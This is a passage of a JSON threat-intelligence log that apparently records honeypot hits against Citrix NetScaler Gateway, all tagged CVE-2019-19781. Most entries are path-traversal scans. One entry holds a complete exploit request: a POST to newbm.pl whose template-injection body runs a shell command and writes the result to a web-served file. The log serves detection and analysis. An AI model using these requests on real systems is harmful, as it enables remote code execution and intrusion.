  762.       "event_count": 2,
  763.       "first_seen": "2020-01-12T07:50:59Z",
  764.       "last_seen": "2020-01-12T07:50:59Z"
  765.     },
  766.     {
  767.       "source_ip_address": "156.17.191.239",
  768.       "country": "PL",
  769.       "user_agent": "curl/7.52.1",
  770.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  771.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  772.       "target_port": 443,
  773.       "protocol": "tcp",
  774.       "tags": [
  775.         {
  776.           "cve": "CVE-2019-19781",
  777.           "category": "Platform",
  778.           "description": "Citrix NetScaler Gateway Exploit"
  779.         }
  780.       ],
  781.       "event_count": 1,
  782.       "first_seen": "2020-01-12T07:50:58Z",
  783.       "last_seen": "2020-01-12T07:50:58Z"
  784.     },
  785.     {
  786.       "source_ip_address": "5.129.216.29",
  787.       "country": "RU",
  788.       "user_agent": "Mozilla/5.0",
  789.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  790.       "post_data": "",
  791.       "target_port": 80,
  792.       "protocol": "tcp",
  793.       "tags": [
  794.         {
  795.           "cve": "CVE-2019-19781",
  796.           "category": "Platform",
  797.           "description": "Citrix NetScaler Gateway Scan"
  798.         }
  799.       ],
  800.       "event_count": 1,
  801.       "first_seen": "2020-01-12T07:03:45Z",
  802.       "last_seen": "2020-01-12T07:03:45Z"
  803.     },
  804.     {
  805.       "source_ip_address": "78.41.182.12",
  806.       "country": "RU",
  807.       "user_agent": "Mozilla/5.0",
  808.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  809.       "post_data": "",
  810.       "target_port": 80,
  811.       "protocol": "tcp",
  812.       "tags": [
  813.         {
  814.           "cve": "CVE-2019-19781",
  815.           "category": "Platform",
  816.           "description": "Citrix NetScaler Gateway Scan"
  817.         }
  818.       ],
  819.       "event_count": 1,
  820.       "first_seen": "2020-01-12T06:59:10Z",
  821.       "last_seen": "2020-01-12T06:59:10Z"
  822.     },
  823.     {
  824.       "source_ip_address": "85.93.137.133",
  825.       "country": "RU",
  826.       "user_agent": "Mozilla/5.0",
  827.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
  828.       "post_data": "",
  829.       "target_port": 80,
  830.       "protocol": "tcp",
  831.       "tags": [
  832.         {
  833.           "cve": "CVE-2019-19781",
  834.           "category": "Platform",
  835.           "description": "Citrix NetScaler Gateway Scan"
  836.         }
  837.       ],
  838.       "event_count": 2,
  839.       "first_seen": "2020-01-12T06:53:05Z",
  840.       "last_seen": "2020-01-12T06:53:05Z"
  841.     },
  842.     {
  843.       "source_ip_address": "95.221.163.206",
  844.       "country": "RU",
  845.       "user_agent": "Mozilla/5.0",
  846.       "payload": "GET /vpns/ HTTP/1.0",
  847.       "post_data": "",
  848.       "target_port": 80,
  849.       "protocol": "tcp",
  850.       "tags": [
  851.         {
  852.           "cve": "CVE-2019-19781",
  853.           "category": "Platform",
  854.           "description": "Possible Citrix NetScaler Gateway Scan"
  855.         }
  856.       ],
  857.       "event_count": 2,
  858.       "first_seen": "2020-01-11T08:31:17Z",
  859.       "last_seen": "2020-01-11T08:31:17Z"
  860.     },
  861.     {
  862.       "source_ip_address": "194.190.64.90",
  863.       "country": "RU",
  864.       "user_agent": "Mozilla/5.0",
  865.       "payload": "GET /vpns/ HTTP/1.0",
  866.       "post_data": "",
  867.       "target_port": 80,
  868.       "protocol": "tcp",
  869.       "tags": [
  870.         {
  871.           "cve": "CVE-2019-19781",
  872.           "category": "Platform",
  873.           "description": "Possible Citrix NetScaler Gateway Scan"
  874.         }
  875.       ],
  876.       "event_count": 1,
  877.       "first_seen": "2020-01-11T08:29:34Z",
  878.       "last_seen": "2020-01-11T08:29:34Z"
  879.     },
  880.     {
  881.       "source_ip_address": "172.105.64.188",
  882.       "country": "DE",
  883.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  884.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  885.       "post_data": "",
  886.       "target_port": 443,
  887.       "protocol": "tcp",
  888.       "tags": [
  889.         {
  890.           "cve": "CVE-2019-19781",
  891.           "category": "Platform",
  892.           "description": "Citrix NetScaler Gateway Scan"
  893.         }
  894.       ],
  895.       "event_count": 284,
  896.       "first_seen": "2020-01-09T21:28:04Z",
  897.       "last_seen": "2020-01-10T10:31:56Z"
  898.     },
  899.     {
  900.       "source_ip_address": "157.245.226.196",
  901.       "country": "US",
  902.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  903.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  904.       "post_data": "",
  905.       "target_port": 443,
  906.       "protocol": "tcp",
  907.       "tags": [
  908.         {
  909.           "cve": "CVE-2019-19781",
  910.           "category": "Platform",
  911.           "description": "Citrix NetScaler Gateway Scan"
  912.         }
  913.       ],
  914.       "event_count": 1,
  915.       "first_seen": "2020-01-10T03:08:58Z",
  916.       "last_seen": "2020-01-10T03:08:58Z"
  917.     },
  918.     {
  919.       "source_ip_address": "85.90.247.110",
  920.       "country": "DE",
  921.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  922.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  923.       "post_data": "",
  924.       "target_port": 443,
  925.       "protocol": "tcp",
  926.       "tags": [
  927.         {
  928.           "cve": "CVE-2019-19781",
  929.           "category": "Platform",
  930.           "description": "Citrix NetScaler Gateway Scan"
  931.         }
  932.       ],
  933.       "event_count": 5,
  934.       "first_seen": "2020-01-09T21:58:10Z",
  935.       "last_seen": "2020-01-09T23:51:36Z"
  936.     },
  937.     {
  938.       "source_ip_address": "139.162.189.189",
  939.       "country": "DE",
  940.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  941.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  942.       "post_data": "",
  943.       "target_port": 443,
  944.       "protocol": "tcp",
  945.       "tags": [
  946.         {
  947.           "cve": "CVE-2019-19781",
  948.           "category": "Platform",
  949.           "description": "Citrix NetScaler Gateway Scan"
  950.         }
  951.       ],
  952.       "event_count": 4,
  953.       "first_seen": "2020-01-09T17:46:04Z",
  954.       "last_seen": "2020-01-09T23:48:08Z"
  955.     },
  956.     {
  957.       "source_ip_address": "173.255.200.120",
  958.       "country": "US",
  959.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  960.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  961.       "post_data": "",
  962.       "target_port": 443,
  963.       "protocol": "tcp",
  964.       "tags": [
  965.         {
  966.           "cve": "CVE-2019-19781",
  967.           "category": "Platform",
  968.           "description": "Citrix NetScaler Gateway Scan"
  969.         }
  970.       ],
  971.       "event_count": 321,
  972.       "first_seen": "2020-01-09T15:27:14Z",
  973.       "last_seen": "2020-01-09T23:24:09Z"
  974.     },
  975.     {
  976.       "source_ip_address": "45.79.129.215",
  977.       "country": "US",
  978.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  979.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  980.       "post_data": "",
  981.       "target_port": 443,
  982.       "protocol": "tcp",
  983.       "tags": [
  984.         {
  985.           "cve": "CVE-2019-19781",
  986.           "category": "Platform",
  987.           "description": "Citrix NetScaler Gateway Scan"
  988.         }
  989.       ],
  990.       "event_count": 2,
  991.       "first_seen": "2020-01-09T21:43:56Z",
  992.       "last_seen": "2020-01-09T21:43:56Z"
  993.     },
  994.     {
  995.       "source_ip_address": "172.104.210.59",
  996.       "country": "US",
  997.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  998.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  999.       "post_data": "",
  1000.       "target_port": 443,
  1001.       "protocol": "tcp",
  1002.       "tags": [
  1003.         {
  1004.           "cve": "CVE-2019-19781",
  1005.           "category": "Platform",
  1006.           "description": "Citrix NetScaler Gateway Scan"
  1007.         }
  1008.       ],
  1009.       "event_count": 1,
  1010.       "first_seen": "2020-01-09T20:13:04Z",
  1011.       "last_seen": "2020-01-09T20:13:04Z"
  1012.     },
  1013.     {
  1014.       "source_ip_address": "139.59.212.187",
  1015.       "country": "DE",
  1016.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1017.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1018.       "post_data": "",
  1019.       "target_port": 443,
  1020.       "protocol": "tcp",
  1021.       "tags": [
  1022.         {
  1023.           "cve": "CVE-2019-19781",
  1024.           "category": "Platform",
  1025.           "description": "Citrix NetScaler Gateway Scan"
  1026.         }
  1027.       ],
  1028.       "event_count": 16,
  1029.       "first_seen": "2020-01-09T16:21:44Z",
  1030.       "last_seen": "2020-01-09T20:09:27Z"
  1031.     },
  1032.     {
  1033.       "source_ip_address": "69.164.202.142",
  1034.       "country": "US",
  1035.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1036.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1037.       "post_data": "",
  1038.       "target_port": 443,
  1039.       "protocol": "tcp",
  1040.       "tags": [
  1041.         {
  1042.           "cve": "CVE-2019-19781",
  1043.           "category": "Platform",
  1044.           "description": "Citrix NetScaler Gateway Scan"
  1045.         }
  1046.       ],
  1047.       "event_count": 1,
  1048.       "first_seen": "2020-01-09T19:45:08Z",
  1049.       "last_seen": "2020-01-09T19:45:08Z"
  1050.     },
  1051.     {
  1052.       "source_ip_address": "45.79.29.24",
  1053.       "country": "US",
  1054.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1055.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1056.       "post_data": "",
  1057.       "target_port": 443,
  1058.       "protocol": "tcp",
  1059.       "tags": [
  1060.         {
  1061.           "cve": "CVE-2019-19781",
  1062.           "category": "Platform",
  1063.           "description": "Citrix NetScaler Gateway Scan"
  1064.         }
  1065.       ],
  1066.       "event_count": 5,
  1067.       "first_seen": "2020-01-09T19:23:01Z",
  1068.       "last_seen": "2020-01-09T19:23:01Z"
  1069.     },
  1070.     {
  1071.       "source_ip_address": "45.33.92.155",
  1072.       "country": "US",
  1073.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1074.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1075.       "post_data": "",
  1076.       "target_port": 443,
  1077.       "protocol": "tcp",
  1078.       "tags": [
  1079.         {
  1080.           "cve": "CVE-2019-19781",
  1081.           "category": "Platform",
  1082.           "description": "Citrix NetScaler Gateway Scan"
  1083.         }
  1084.       ],
  1085.       "event_count": 156,
  1086.       "first_seen": "2020-01-09T16:43:03Z",
  1087.       "last_seen": "2020-01-09T16:43:03Z"
  1088.     },
  1089.     {
  1090.       "source_ip_address": "142.93.150.124",
  1091.       "country": "CA",
  1092.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
  1093.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  1094.       "post_data": "",
  1095.       "target_port": 443,
  1096.       "protocol": "tcp",
  1097.       "tags": [
  1098.         {
  1099.           "cve": "CVE-2019-19781",
  1100.           "category": "Platform",
  1101.           "description": "Citrix NetScaler Gateway Scan"
  1102.         }
  1103.       ],
  1104.       "event_count": 8,
  1105.       "first_seen": "2020-01-09T16:21:38Z",
  1106.       "last_seen": "2020-01-09T16:21:38Z"
  1107.     }
  1108.   ]
  1109. }